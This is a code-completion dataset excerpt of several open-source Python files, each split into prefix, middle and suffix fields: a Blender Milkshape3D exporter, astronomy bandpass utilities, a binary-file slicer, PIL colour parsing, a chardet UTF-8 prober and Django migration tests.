repo_name
stringlengths 5
100
| path
stringlengths 4
231
| language
stringclasses 1
value | license
stringclasses 15
values | size
int64 6
947k
| score
float64 0
0.34
| prefix
stringlengths 0
8.16k
| middle
stringlengths 3
512
| suffix
stringlengths 0
8.17k
|
---|---|---|---|---|---|---|---|---|
pvint/Blender2MS3d
|
io_mesh_ms3d/export_ms3d.py
|
Python
|
gpl-2.0
| 11,954 | 0.03915 |
# ##### BEGIN GPL LICENSE BLOCK #####
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ##### END GPL LICENSE BLOCK #####
# Copyright (C) 2004-2015: Paul Vint pjvint@gmail.com
"""
This script exports Milkshape3d text files from Blender (http://www.blender.org). It supports face and vertex normals,
colours, and texture coordinates per face or per vertex.
Only one mesh can be exported at a time.
"""
import bpy
import os
DEBUG = True
def getPrimaryVertexGroup(_vgroups, _v):
g = -1
w = 0
## Scan through any vertex groups and return the index of the one with the highest weight (or -1 if none)
for vertgroup in _v.groups:
if (vertgroup.weight > w):
w = vertgroup.weight
g = vertgroup.group
#fw("xx%fxx" % vertgroup.group)
return g
def face_iter_func(mesh):
uv_layer = mesh.uv_textures.active.data
uv_layer_len = len(uv_layer)
faces = mesh.faces
for i in range(uv_layer_len):
uv_elem = uv_layer[i]
yield (i, uv_layer[i].uv)
def save(operator,
context,
filepath="",
use_modifiers=True,
use_normals=True,
use_uv_coords=True,
use_colors=True,
):
def rvec3d(v):
return round(v[0], 6), round(v[1], 6), round(v[2], 6)
def rvec2d(v):
return round(v[0], 6), round(v[1], 6)
scene = context.scene
obj = context.active_object
if not obj:
raise Exception("Error, Select 1 active object")
# Multiple meshes
objects = context.selected_objects
file = open(filepath, "w", encoding="utf8", newline="\n")
fw = file.write
fw("// Milkshape 3D ASCII\n\n")
fw("Frames: 30\n")
fw("Frame: 1\n\n")
if scene.objects.active:
bpy.ops.object.mode_set(mode='OBJECT')
o = 0
numArmatures = 0
numMeshes = 0
# count the meshes
for obj in objects:
if obj.type == "MESH":
numMeshes = numMeshes + 1
fw("Meshes: %d\n" % numMeshes)
for obj in objects:
## Check if it's an armature
if obj.type == "ARMATURE":
numArmatures = numArmatures + 1
else:
if use_modifiers:
mesh = obj.to_mesh(scene, True, 'PREVIEW')
else:
mesh = obj.data
if not mesh:
raise Exception("Error, could not get mesh data from active object")
# mesh.transform(obj.matrix_world) # XXX
has_uv = (len(mesh.uv_textures) > 0)
has_uv_vertex = (len(mesh.sticky) > 0)
# FIXME
#has_uv = True
has_vcol = len(mesh.vertex_colors) > 0
#if (not has_uv) and (not has_uv_vertex):
# use_uv_coords = False
if not has_vcol:
use_colors = False
if not use_uv_coords:
has_uv = has_uv_vertex = False
if not use_colors:
has_vcol = False
if has_uv:
active_uv_layer = mesh.uv_textures.active
if not active_uv_layer:
use_uv_coords = False
has_uv = False
else:
active_uv_layer = active_uv_layer.data
if False: # Testing
for i, uv in face_iter_func(mesh):
fw("%d %f \n" % (i, uv[0][0]))
return True
## Get UV list
if has_uv:
faceUVs = []
for i, uv in face_iter_func(mesh):
faceUVs.append(uv)
if has_vcol:
active_col_layer = mesh.vertex_colors.active
if not active_col_layer:
use_colors = False
has_vcol = False
else:
active_col_layer = active_col_layer.data
# in case
color = uvcoord = uvcoord_key = normal = normal_key = None
mesh_verts = mesh.vertices # save a lookup
ply_verts = [] # list of dictionaries
# vdict = {} # (index, normal, uv) -> new index
vdict = [{} for i in range(len(mesh_verts))]
ply_faces = [[] for f in range(len(mesh.faces))]
vert_count = 0
## Vertex Group Testing
vGroups = []
vGroupsIndices = []
if (obj.vertex_groups):
for x in obj.vertex_groups:
#fw("=%d %s\n" % (x.index, x.name))
vGroups.append({x.index, x.name})
vGroupsIndices.append(x.index)
## Yielded:
#0 Bone
#1 Bone.002
#2 Bone.001
for i, f in enumerate(mesh.faces):
# GOOD: fw("Verts: %d %d %d\n" % (f.vertices[0], f.vertices[1], f.vertices[2]))
smooth = f.use_smooth
if not smooth:
normal = tuple(f.normal)
normal_key = rvec3d(normal)
if has_uv:
uv = active_uv_layer[i]
uv = uv.uv1, uv.uv2, uv.uv3, uv.uv4 # XXX - crufty :/
if has_vcol:
col = active_col_layer[i]
col = col.color1[:], col.color2[:], col.color3[:], col.color4[:]
f_verts = f.vertices
pf = ply_faces[i]
## FIXME Deprecated
for j, vidx in enumerate(f_verts):
v = mesh_verts[vidx]
if smooth:
normal = tuple(v.normal)
normal_key = rvec3d(normal)
if has_uv:
uvcoord = uv[j][0], 1.0 - uv[j][1]
uvcoord_key = rvec2d(uvcoord)
elif has_uv_vertex:
uvcoord = v.uvco[0], 1.0 - v.uvco[1]
uvcoord_key = rvec2d(uvcoord)
if has_vcol:
color = col[j]
color = (int(color[0] * 255.0),
int(color[1] * 255.0),
int(color[2] * 255.0),
)
key = normal_key, uvcoord_key, color
vdict_local = vdict[vidx]
pf_vidx = vdict_local.get(key) # Will be None initially
if pf_vidx is None: # same as vdict_local.has_key(key)
pf_vidx = vdict_local[key] = vert_count
ply_verts.append((vidx, normal, uvcoord, color))
vert_count += 1
pf.append(pf_vidx)
# Mesh name, flags, mater
|
ial index
fw("\"%s\" 0 %d\n" % (obj.name, o))
#fw("%d\n" % (len(mesh.faces) *
|
3))
#if use_colors:
# fw("property uchar red\n"
# "property uchar green\n"
# "property uchar blue\n")
#fw("element face %d\n" % len(mesh.faces))
#fw("property list uchar uint vertex_indices\n")
#fw("end_header\n")
# mesh.vertices is array of vertex coords
# face.vertices is array of vertex indices
# to get unique vertices in the file create an array of all vertices and
# then find the highest index in the list of faces and use only up to
# that one to only have unique vertices
maxIndex = 0
numVerts = 0
for f in mesh.faces:
for v in f.vertices:
numVerts = numVerts + 1
if (v >= maxIndex):
maxIndex = v
maxIndex = maxIndex + 1
#fw("%d\n" % (maxIndex))
## create array of verts
vco = []
fverts = []
## make a properly ordered list of vertices
for f in mesh.faces:
for v in mesh.vertices:
fverts.append(v)
### The following method is crap - need to duplicate verts for when they have different
### UV coords for different faces!
#for i in range(0, maxIndex):
#fw("0 %.4f %.4f %.4f " % (-fverts[i].co[0], fverts[i].co[2], -fverts[i].co[1]))
#fw('0.0, 0.0') # uv
# Vertex Group
#vg = getPrimaryVertexGroup(vGroups, fverts[i])
#fw(" %d\n" % vg)
## Prep for UVs
activeUV = mesh.uv_textures[0].data
#if has_uv:
# actuveUV = mesh.uv_textures
### Dump each vert on each face
fw("%d\n" % numVerts)
fIdx = 0
for f in mesh.faces:
if (len(f.vertices) != 3):
raise Exception("Error! All faces must be triangles. (Convert in edit mode by pressing CTRL-t)")
## Loop through each vertex in the face
vIdx = 0
uv = activeUV[fIdx]
fuv = uv.uv1, uv.uv2, uv.uv3
for v in f.vertices:
fw("0 %.4f %.4f %.4f " % (-fverts[v].co[0], fverts[v].co[2], -fverts[v].co[1]))
## uv coords
#for i, uv in face_iter_func(mesh):
#fw("%d %f \n" % (i, uv[0][0]))
if has_uv:
fw("%.4f %.4f " % (faceUVs[fIdx][vIdx][0], 1.0 - faceUVs[fIdx][vIdx][1]))
#fw("%.4f %.4f " % (fverts[v].uv[0], 1 - fverts[v].uv[1]))
else:
fw("0.0000 0.0000 ");
## Vertex Group
if not obj.vertex_groups:
vg = -1
|
sncosmo/sncosmo
|
sncosmo/bandpasses.py
|
Python
|
bsd-3-clause
| 16,460 | 0 |
# Licensed under a 3-clause BSD style license - see LICENSE.rst
import copy
import astropy.units as u
import numpy as np
from astropy.io import ascii
from astropy.utils import lazyproperty
from scipy.interpolate import splev, splrep
from ._registry import Registry
from .constants import HC_ERG_AA, SPECTRUM_BANDFLUX_SPACING
from .utils import integration_grid
__all__ = ['get_bandpass', 'read_bandpass', 'Bandpass', 'AggregateBandpass',
'BandpassInterpolator']
_BANDPAS
|
SES = Registry()
_BANDPASS_INTERPO
|
LATORS = Registry()
def get_bandpass(name, *args):
"""Get a Bandpass from the registry by name."""
if isinstance(name, Bandpass):
return name
if len(args) == 0:
return _BANDPASSES.retrieve(name)
else:
interp = _BANDPASS_INTERPOLATORS.retrieve(name)
return interp.at(*args)
def read_bandpass(fname, fmt='ascii', wave_unit=u.AA,
trans_unit=u.dimensionless_unscaled,
normalize=False, trim_level=None, name=None):
"""Read bandpass from two-column ASCII file containing wavelength and
transmission in each line.
Parameters
----------
fname : str
File name.
fmt : {'ascii'}
File format of file. Currently only ASCII file supported.
wave_unit : `~astropy.units.Unit` or str, optional
Wavelength unit. Default is Angstroms.
trans_unit : `~astropy.units.Unit`, optional
Transmission unit. Can be `~astropy.units.dimensionless_unscaled`,
indicating a ratio of transmitted to incident photons, or units
proportional to inverse energy, indicating a ratio of transmitted
photons to incident energy. Default is ratio of transmitted to
incident photons.
normalize : bool, optional
If True, normalize fractional transmission to be 1.0 at peak.
It is recommended to set to True if transmission is in units
of inverse energy. (When transmission is given in these units, the
absolute value is usually not significant; normalizing gives more
reasonable transmission values.) Default is False.
name : str, optional
Identifier. Default is `None`.
Returns
-------
band : `~sncosmo.Bandpass`
"""
if fmt != 'ascii':
raise ValueError("format {0} not supported. Supported formats: 'ascii'"
.format(fmt))
t = ascii.read(fname, names=['wave', 'trans'])
return Bandpass(t['wave'], t['trans'], wave_unit=wave_unit,
trans_unit=trans_unit, normalize=normalize,
trim_level=trim_level, name=name)
def slice_exclude_below(a, minvalue, grow=1):
"""Contiguous range in 1-d array `a` that excludes values less than
`minvalue`. Range is expanded by `grow` in each direction."""
idx = np.flatnonzero(a >= minvalue)
i0 = max(idx[0] - grow, 0)
i1 = min(idx[-1] + 1 + grow, len(a)) # exclusive
return slice(i0, i1)
class Bandpass(object):
"""Transmission as a function of spectral wavelength.
Parameters
----------
wave : list_like
Wavelength. Monotonically increasing values.
trans : list_like
Transmission fraction.
wave_unit : `~astropy.units.Unit` or str, optional
Wavelength unit. Default is Angstroms.
trans_unit : `~astropy.units.Unit`, optional
Transmission unit. Can be `~astropy.units.dimensionless_unscaled`,
indicating a ratio of transmitted to incident photons, or units
proportional to inverse energy, indicating a ratio of transmitted
photons to incident energy. Default is ratio of transmitted to
incident photons.
normalize : bool, optional
If True, normalize fractional transmission to be 1.0 at peak.
It is recommended to set normalize=True if transmission is in units
of inverse energy. (When transmission is given in these units, the
absolute value is usually not significant; normalizing gives more
reasonable transmission values.) Default is False.
trim_level : float, optional
If given, crop bandpass to region where transmission is above this
fraction of the maximum transmission. For example, if maximum
transmission is 0.5, ``trim_level=0.001`` will remove regions where
transmission is below 0.0005. Only contiguous regions on the sides
of the bandpass are removed.
name : str, optional
Identifier. Default is `None`.
Examples
--------
Construct a Bandpass and access the input arrays:
>>> b = Bandpass([4000., 4200., 4400.], [0.5, 1.0, 0.5])
>>> b.wave
array([ 4000., 4200., 4400.])
>>> b.trans
array([ 0.5, 1. , 0.5])
Bandpasses act like continuous 1-d functions (linear interpolation is
used):
>>> b([4100., 4300.])
array([ 0.75, 0.75])
The effective (transmission-weighted) wavelength is a property:
>>> b.wave_eff
4200.0
The ``trim_level`` keyword can be used to remove "out-of-band"
transmission upon construction. The following example removes regions of
the bandpass with tranmission less than 1 percent of peak:
>>> band = Bandpass([4000., 4100., 4200., 4300., 4400., 4500.],
... [0.001, 0.002, 0.5, 0.6, 0.003, 0.001],
... trim_level=0.01)
>>> band.wave
array([ 4100., 4200., 4300., 4400.])
>>> band.trans
array([ 0.002, 0.5 , 0.6 , 0.003])
While less strictly correct than including the "out-of-band" transmission,
only considering the region of the bandpass where transmission is
significant can improve model-bandpass overlap as well as performance.
"""
def __init__(self, wave, trans, wave_unit=u.AA,
trans_unit=u.dimensionless_unscaled, normalize=False,
name=None, trim_level=None):
wave = np.asarray(wave, dtype=np.float64)
trans = np.asarray(trans, dtype=np.float64)
if wave.shape != trans.shape:
raise ValueError('shape of wave and trans must match')
if wave.ndim != 1:
raise ValueError('only 1-d arrays supported')
# Ensure that units are actually units and not quantities, so that
# `to` method returns a float and not a Quantity.
wave_unit = u.Unit(wave_unit)
trans_unit = u.Unit(trans_unit)
if wave_unit != u.AA:
wave = wave_unit.to(u.AA, wave, u.spectral())
# If transmission is in units of inverse energy, convert to
# unitless transmission:
#
# (transmitted photons / incident photons) =
# (photon energy) * (transmitted photons / incident energy)
#
# where photon energy = h * c / lambda
if trans_unit != u.dimensionless_unscaled:
trans = (HC_ERG_AA / wave) * trans_unit.to(u.erg**-1, trans)
# Check that values are monotonically increasing.
# We could sort them, but if this happens, it is more likely a user
# error or faulty bandpass definition. So we leave it to the user to
# sort them.
if not np.all(np.ediff1d(wave) > 0.):
raise ValueError('bandpass wavelength values must be monotonically'
' increasing when supplied in wavelength or '
'decreasing when supplied in energy/frequency.')
if normalize:
trans /= np.max(trans)
# Trim "out-of-band" transmission
if trim_level is not None:
s = slice_exclude_below(trans, np.max(trans) * trim_level, grow=1)
wave = wave[s]
trans = trans[s]
# if more than one leading or trailing transmissions are zero, we
# can remove them.
if ((trans[0] == 0.0 and trans[1] == 0.0) or (trans[-1] == 0.0 and
trans[-2] == 0.0)):
i = 0
while i < len(trans) and trans[i] == 0.0:
i += 1
if i == len(trans):
raise ValueError('all zero transmission')
j = len(trans) - 1
while j >= 0 and tran
|
davidh-ssec/pyfbf
|
pyfbf/slicer.py
|
Python
|
gpl-3.0
| 3,928 | 0.003564 |
#!/usr/bin/env python
from . import memfbf
from numpy import append
import os
import logging
from glob import glob
LOG = logging.getLogger(__name__)
class SlicerFrame(dict):
pass
class FBFSlicer(object):
"""Given a workspace directory of flat binary files, grab all useful filenames and return a record of data at a
time as a python dictionary.
"""
def __init__(self, work_dir, buffer_size=0, filename_filter=None):
"""Initialize slicer object parameters.
:param work_dir: Workspace directory of flat binary files to read
:param buffer_size: Circular buffer size or 0 for non-circular buffers/FBFs
:param filename_filter: Filter function that returns True if the provided file should be opened for reading.
Should return False otherwise.
"""
self._wd = work_dir
self._buffer_size = buffer_size
self._open_files = dict()
if filename_filter is None:
filename_filter = lambda filename: True
self.should_include = filename_filter
def _update_open_files(self):
for fn in glob(os.path.join(self._wd, '*')):
if fn not in self._open_files and self.should_include(os.path.split(fn)[-1]):
LOG.debug('opening %s' % fn)
try:
nfo = memfbf.FBF(fn)
except Exception as oops:
nfo = None
LOG.info('%s could not be opened as FBF' % fn)
LOG.debug(repr(oops))
LOG.debug('found new file %s' % fn)
self._open_files[fn] = nfo
def __call__(self, first_record, last_record=None):
"""Retrieve a slice of a FBF directory using inclusive 1-based record number range, noting
that last-first+1 records are returned.
"""
last_record = first_record if last_record is None else last_record
if not self._open_files:
self._update_open_files()
data = SlicerFrame()
for name, nfo in self._open_files.items():
if nfo is not None:
# note we use % in order to deal with
# wavenumber files that are only ever 1 record long
# circular buffers which are fixed length files
file_len = nfo.length()
# check for non-circular buffer case and going off the end of the file
# note use of > since record numbers are 1-based
if (self._buffer_size == 0) and (file_len != 1) and (first_record > file_len or last_record > file_len):
LOG.warning('%s: length is %d but start-end is %d-%d' % (name, file_len, first_record, last_record))
return None
# check for circular buffers that aren't preallocated properly
if self._buffer_size > 0 and file_len not in (1, self._buffer_size):
LOG.info('buffer file %s size mismatch (%d != %d)! ignoring' % (name, file_len, self._buffer_size))
else:
# 0-based circular buffer
first_index = (first_record - 1) % file_len
last_index = (last_record - 1) % file_len
if last_index >= first_index:
# Records are in one continuous line
idx = slice(first_index, last_index + 1) # +1 to include last item
data[nfo.stemname] = nfo[idx]
else:
# Records are on two ends of the circular buffer
idx1 = slice(first_index, self._buffer_size)
idx2 = slice(0, last_index + 1) # +1 to include last item
arr1 = nfo[idx1]
arr2 = nfo[idx2]
dat
|
a[nfo
|
.stemname] = append(arr1, arr2, axis=0)
return data
|
tannerbohn/ScholarVR
|
Code/fileIO.py
|
Python
|
gpl-2.0
| 368 | 0.05163 |
import json
|
def jsonSave(data, fileName, indent=True, sort=False, oneLine=False):
f = open(fileName, 'w')
if indent:
f.write(json.dumps(data, indent=4, sort_keys=sort))
else:
f.write(json.dumps(data, sort_ke
|
ys=sort))
f.close()
def jsonLoad(fileName):
try:
file = open(fileName)
t=file.read()
file.close()
return json.loads(t)
except:
return {}
|
Amechi101/concepteur-market-app
|
venv/lib/python2.7/site-packages/PIL/ImageColor.py
|
Python
|
mit
| 8,085 | 0.007421 |
#
# The Python Imaging Library
# $Id$
#
# map CSS3-style colour description strings to RGB
#
# History:
# 2002-10-24 fl Added support for CSS-style color strings
# 2002-12-15 fl Added RGBA support
# 2004-03-27 fl Fixed remaining int() problems for Python 1.5.2
# 2004-07-19 fl Fixed gray/grey spelling issues
# 2009-03-05 fl Fixed rounding error in grayscale calculation
#
# Copyright (c) 2002-2004 by Secret Labs AB
# Copyright (c) 2002-2004 by Fredrik Lundh
#
# See the README file for information on usage and redistribution.
#
from PIL import Image
import re
##
# Convert color str
|
ing to RGB tuple.
#
# @param color A CSS3-style colour string.
# @return An RGB-tuple.
# @exception ValueError If the color string could not be interpreted
# as an RGB value.
def getrgb(colo
|
r):
"""
Convert a color string to an RGB tuple. If the string cannot be parsed,
this function raises a :py:exc:`ValueError` exception.
.. versionadded:: 1.1.4
:param color: A color string
:return: ``(red, green, blue)``
"""
try:
rgb = colormap[color]
except KeyError:
try:
# fall back on case-insensitive lookup
rgb = colormap[color.lower()]
except KeyError:
rgb = None
# found color in cache
if rgb:
if isinstance(rgb, tuple):
return rgb
colormap[color] = rgb = getrgb(rgb)
return rgb
# check for known string formats
m = re.match("#\w\w\w$", color)
if m:
return (
int(color[1]*2, 16),
int(color[2]*2, 16),
int(color[3]*2, 16)
)
m = re.match("#\w\w\w\w\w\w$", color)
if m:
return (
int(color[1:3], 16),
int(color[3:5], 16),
int(color[5:7], 16)
)
m = re.match("rgb\(\s*(\d+)\s*,\s*(\d+)\s*,\s*(\d+)\s*\)$", color)
if m:
return (
int(m.group(1)),
int(m.group(2)),
int(m.group(3))
)
m = re.match("rgb\(\s*(\d+)%\s*,\s*(\d+)%\s*,\s*(\d+)%\s*\)$", color)
if m:
return (
int((int(m.group(1)) * 255) / 100.0 + 0.5),
int((int(m.group(2)) * 255) / 100.0 + 0.5),
int((int(m.group(3)) * 255) / 100.0 + 0.5)
)
m = re.match("hsl\(\s*(\d+)\s*,\s*(\d+)%\s*,\s*(\d+)%\s*\)$", color)
if m:
from colorsys import hls_to_rgb
rgb = hls_to_rgb(
float(m.group(1)) / 360.0,
float(m.group(3)) / 100.0,
float(m.group(2)) / 100.0,
)
return (
int(rgb[0] * 255 + 0.5),
int(rgb[1] * 255 + 0.5),
int(rgb[2] * 255 + 0.5)
)
m = re.match("rgba\(\s*(\d+)\s*,\s*(\d+)\s*,\s*(\d+)\s*,\s*(\d+)\s*\)$", color)
if m:
return (
int(m.group(1)),
int(m.group(2)),
int(m.group(3)),
int(m.group(4))
)
raise ValueError("unknown color specifier: %r" % color)
def getcolor(color, mode):
"""
Same as :py:func:`~PIL.ImageColor.getrgb`, but converts the RGB value to a
greyscale value if the mode is not color or a palette image. If the string
cannot be parsed, this function raises a :py:exc:`ValueError` exception.
.. versionadded:: 1.1.4
:param color: A color string
:return: ``(red, green, blue)``
"""
# same as getrgb, but converts the result to the given mode
color = getrgb(color)
if mode == "RGB":
return color
if mode == "RGBA":
if len(color) == 3:
color = (color + (255,))
r, g, b, a = color
return r, g, b, a
if Image.getmodebase(mode) == "L":
r, g, b = color
return (r*299 + g*587 + b*114)//1000
return color
colormap = {
# X11 colour table (from "CSS3 module: Color working draft"), with
# gray/grey spelling issues fixed. This is a superset of HTML 4.0
# colour names used in CSS 1.
"aliceblue": "#f0f8ff",
"antiquewhite": "#faebd7",
"aqua": "#00ffff",
"aquamarine": "#7fffd4",
"azure": "#f0ffff",
"beige": "#f5f5dc",
"bisque": "#ffe4c4",
"black": "#000000",
"blanchedalmond": "#ffebcd",
"blue": "#0000ff",
"blueviolet": "#8a2be2",
"brown": "#a52a2a",
"burlywood": "#deb887",
"cadetblue": "#5f9ea0",
"chartreuse": "#7fff00",
"chocolate": "#d2691e",
"coral": "#ff7f50",
"cornflowerblue": "#6495ed",
"cornsilk": "#fff8dc",
"crimson": "#dc143c",
"cyan": "#00ffff",
"darkblue": "#00008b",
"darkcyan": "#008b8b",
"darkgoldenrod": "#b8860b",
"darkgray": "#a9a9a9",
"darkgrey": "#a9a9a9",
"darkgreen": "#006400",
"darkkhaki": "#bdb76b",
"darkmagenta": "#8b008b",
"darkolivegreen": "#556b2f",
"darkorange": "#ff8c00",
"darkorchid": "#9932cc",
"darkred": "#8b0000",
"darksalmon": "#e9967a",
"darkseagreen": "#8fbc8f",
"darkslateblue": "#483d8b",
"darkslategray": "#2f4f4f",
"darkslategrey": "#2f4f4f",
"darkturquoise": "#00ced1",
"darkviolet": "#9400d3",
"deeppink": "#ff1493",
"deepskyblue": "#00bfff",
"dimgray": "#696969",
"dimgrey": "#696969",
"dodgerblue": "#1e90ff",
"firebrick": "#b22222",
"floralwhite": "#fffaf0",
"forestgreen": "#228b22",
"fuchsia": "#ff00ff",
"gainsboro": "#dcdcdc",
"ghostwhite": "#f8f8ff",
"gold": "#ffd700",
"goldenrod": "#daa520",
"gray": "#808080",
"grey": "#808080",
"green": "#008000",
"greenyellow": "#adff2f",
"honeydew": "#f0fff0",
"hotpink": "#ff69b4",
"indianred": "#cd5c5c",
"indigo": "#4b0082",
"ivory": "#fffff0",
"khaki": "#f0e68c",
"lavender": "#e6e6fa",
"lavenderblush": "#fff0f5",
"lawngreen": "#7cfc00",
"lemonchiffon": "#fffacd",
"lightblue": "#add8e6",
"lightcoral": "#f08080",
"lightcyan": "#e0ffff",
"lightgoldenrodyellow": "#fafad2",
"lightgreen": "#90ee90",
"lightgray": "#d3d3d3",
"lightgrey": "#d3d3d3",
"lightpink": "#ffb6c1",
"lightsalmon": "#ffa07a",
"lightseagreen": "#20b2aa",
"lightskyblue": "#87cefa",
"lightslategray": "#778899",
"lightslategrey": "#778899",
"lightsteelblue": "#b0c4de",
"lightyellow": "#ffffe0",
"lime": "#00ff00",
"limegreen": "#32cd32",
"linen": "#faf0e6",
"magenta": "#ff00ff",
"maroon": "#800000",
"mediumaquamarine": "#66cdaa",
"mediumblue": "#0000cd",
"mediumorchid": "#ba55d3",
"mediumpurple": "#9370db",
"mediumseagreen": "#3cb371",
"mediumslateblue": "#7b68ee",
"mediumspringgreen": "#00fa9a",
"mediumturquoise": "#48d1cc",
"mediumvioletred": "#c71585",
"midnightblue": "#191970",
"mintcream": "#f5fffa",
"mistyrose": "#ffe4e1",
"moccasin": "#ffe4b5",
"navajowhite": "#ffdead",
"navy": "#000080",
"oldlace": "#fdf5e6",
"olive": "#808000",
"olivedrab": "#6b8e23",
"orange": "#ffa500",
"orangered": "#ff4500",
"orchid": "#da70d6",
"palegoldenrod": "#eee8aa",
"palegreen": "#98fb98",
"paleturquoise": "#afeeee",
"palevioletred": "#db7093",
"papayawhip": "#ffefd5",
"peachpuff": "#ffdab9",
"peru": "#cd853f",
"pink": "#ffc0cb",
"plum": "#dda0dd",
"powderblue": "#b0e0e6",
"purple": "#800080",
"red": "#ff0000",
"rosybrown": "#bc8f8f",
"royalblue": "#4169e1",
"saddlebrown": "#8b4513",
"salmon": "#fa8072",
"sandybrown": "#f4a460",
"seagreen": "#2e8b57",
"seashell": "#fff5ee",
"sienna": "#a0522d",
"silver": "#c0c0c0",
"skyblue": "#87ceeb",
"slateblue": "#6a5acd",
"slategray": "#708090",
"slategrey": "#708090",
"snow": "#fffafa",
"springgreen": "#00ff7f",
"steelblue": "#4682b4",
"tan": "#d2b48c",
"teal": "#008080",
"thistle": "#d8bfd8",
"tomato": "#ff6347",
"turquoise": "#40e0d0",
"violet": "#ee82ee",
"wheat": "#f5deb3",
"white": "#ffffff",
"whitesmoke": "#f5f5f5",
"yellow": "#ffff00",
"yellowgreen": "#9acd32",
}
|
codecakes/algorithms_monk
|
implementation/lisa_workbook_array_single_iter.py
|
Python
|
mit
| 2,037 | 0.003939 |
#!/bin/python
"""
Lisa just got a new math workbook. A workbook contains exercise problems, grouped into chapters.
There are nn chapters in Lisa's workbook, numbe
|
red from 11 to nn.
The ii-th chapter has titi problems, numbered from 11 to titi.
Each page can hold up to kk problems. There are no empty pages or unnecessary spaces, so only the last page of a chapter may contain fewer than kk problems.
Each new chapter starts on a new page, so a page will never contain problems from
|
more than one chapter.
The page number indexing starts at 11.
Lisa believes a problem to be special if its index (within a chapter) is the same as the page number where it's located. Given the details for Lisa's workbook, can you count its number of special problems?
Note: See the diagram in the Explanation section for more details.
Input Format
The first line contains two integers nn and kk — the number of chapters and the maximum number of problems per page respectively.
The second line contains nn integers t1,t2,…,tnt1,t2,…,tn, where titi denotes the number of problems in the ii-th chapter.
Constraints
1=<n,k,ti=<1001=<n,k,ti=<100
Output Format
Print the number of special problems in Lisa's workbook.
Sample Input
5 3
4 2 6 1 10
Sample Output
4
"""
def spl_question(arr, n, k):
prev_accum = cumm = tot_pg_num = ques = count = 0
for each_chptr in arr:
# O(N)
pgs, rem = divmod(each_chptr, k)
ques = prev_accum = cumm = 0
for pg in xrange(pgs):
tot_pg_num += 1
ques += k
cumm = ques
if prev_accum < tot_pg_num <= cumm:
count += 1
prev_accum = cumm
if rem:
tot_pg_num += 1
ques += rem
cumm = ques
if prev_accum < tot_pg_num <= cumm:
count += 1
return count
if __name__ == "__main__":
n, k = raw_input().strip("\n").split()
n, k = int(n), int(k)
arr = map(int, raw_input().strip("\n").split())
print spl_question(arr, n, k)
|
archifix/settings
|
sublime/Packages/SublimeCodeIntel/libs/chardet/utf8prober.py
|
Python
|
mit
| 2,680 | 0.001866 |
######################## BEGIN LICENSE BLOCK ########################
# The Original Code is mozilla.org code.
#
# The Initial Developer of the Original Code
|
is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are C
|
opyright (C) 1998
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
import sys
from . import constants
from .constants import eStart, eError, eItsMe
from .charsetprober import CharSetProber
from .codingstatemachine import CodingStateMachine
from .mbcssm import UTF8SMModel
ONE_CHAR_PROB = 0.5
class UTF8Prober(CharSetProber):
def __init__(self):
CharSetProber.__init__(self)
self._mCodingSM = CodingStateMachine(UTF8SMModel)
self.reset()
def reset(self):
CharSetProber.reset(self)
self._mCodingSM.reset()
self._mNumOfMBChar = 0
def get_charset_name(self):
return "utf-8"
def feed(self, aBuf):
for c in aBuf:
codingState = self._mCodingSM.next_state(c)
if codingState == eError:
self._mState = constants.eNotMe
break
elif codingState == eItsMe:
self._mState = constants.eFoundIt
break
elif codingState == eStart:
if self._mCodingSM.get_current_charlen() >= 2:
self._mNumOfMBChar += 1
if self.get_state() == constants.eDetecting:
if self.get_confidence() > constants.SHORTCUT_THRESHOLD:
self._mState = constants.eFoundIt
return self.get_state()
def get_confidence(self):
unlike = 0.99
if self._mNumOfMBChar < 6:
for i in range(0, self._mNumOfMBChar):
unlike = unlike * ONE_CHAR_PROB
return 1.0 - unlike
else:
return unlike
|
novafloss/django-north
|
tests/test_showmigrations_command.py
|
Python
|
mit
| 2,400 | 0 |
from django.core.management import call_command
import pytest
import septentrion
def test_showmigrations_command_override(mocker):
mock_django_handle = mocker.patch(
'django.core.management.commands.showmigrations.Command.handle')
mock_show_migrations = mocker.patch(
'septentrion.show_migrations', return_value=b'')
call_command('showmigrations')
assert mock_django_handle.called is False
assert mock_show_migrations.called is True
@pytest.mark.parametrize("manage", [True, False, None])
def test_north_manage_migrations(mocker, settings, manage):
if manage is not None:
settings.NORTH_MANAGE_DB = manage
if manage is None and hasattr(settings, 'NORTH_MANAGE_DB'):
del settings.NORTH_MANAGE_DB
mock = mocker.patch('septentrion.show_migrations', return_value=b'')
call_command('showmigrations')
assert mock.called == bool(manage)
def test_showmigrations_schema_not_inited(capsys, mocker):
|
mock_version = mocker.patch(
'septentrion.db.get_current_schema_version')
# schema not inited
mock_version.return_value = None
call_command('showmigrations')
captured =
|
capsys.readouterr()
assert 'Current version is None' in captured.out
def test_showmigrations_schema(capsys, mocker):
# schema inited
mock_version = mocker.patch(
'septentrion.db.get_current_schema_version')
mock_version.return_value = septentrion.versions.Version.from_string('1.1')
mock_plan = mocker.patch(
'septentrion.core.build_migration_plan')
mock_plan.return_value = [
{
'version': "Version 1.2",
'plan': [
('a-ddl.sql', True, '/somewhere/a-ddl.sql', False),
('b-ddl.sql', False, '/somewhere/b-ddl.sql', True),
]
},
{
'version': "Version 1.3",
'plan': [
('c-ddl.sql', False, '/somewhere/c-ddl.sql', False),
]
}
]
call_command('showmigrations')
captured = capsys.readouterr()
assert "Current version is 1.1" in captured.out
assert "Target version is 1.3" in captured.out
assert "Version 1.2" in captured.out
assert "[X] \x1b[0ma-ddl.sql" in captured.out
